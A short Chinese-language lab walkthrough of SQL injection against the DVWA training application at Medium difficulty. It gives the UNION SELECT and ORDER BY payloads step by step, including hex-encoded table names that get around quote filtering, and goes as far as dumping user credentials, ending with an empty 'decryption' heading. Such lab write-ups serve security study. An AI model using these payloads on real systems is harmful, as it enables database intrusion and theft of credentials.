Sql注入Medium
实验准备:火狐浏览器打开手动代理,高级设置,about:config bp安装完成
- 判断注入类型
如果是字符串型:1‘ or 1=1
报错:
那就是数字型:1 or 1=1
结论:注入类型为数字型
- 判断字段数
猜测字段数为2
id = 1 order by 2
id = 1 order by 3
结论:字段数为2
- 获取数据库名字
id = 1 union select 1,database()
结论:查到到两个数据库名称,一个是dvwa,一个是admin
- 获取dvwa数据库中的数据表
id = 1 union select 1,table_name from information_schema.tables where table_schema=database()
根据:
id = 1 union select 1,table_name from information_schema.tables where table_schema = 0x64767761
结论:获取到两个数据表,分别是guestbook,users
- 获取数据表的字段名
id =1 union select 1,column_name from information_schema.columns where table_name = 0x7573657273
- 查看用户和密码
id = 1 union select user,password from users
结论:查看到users表的账号和密码
- 解密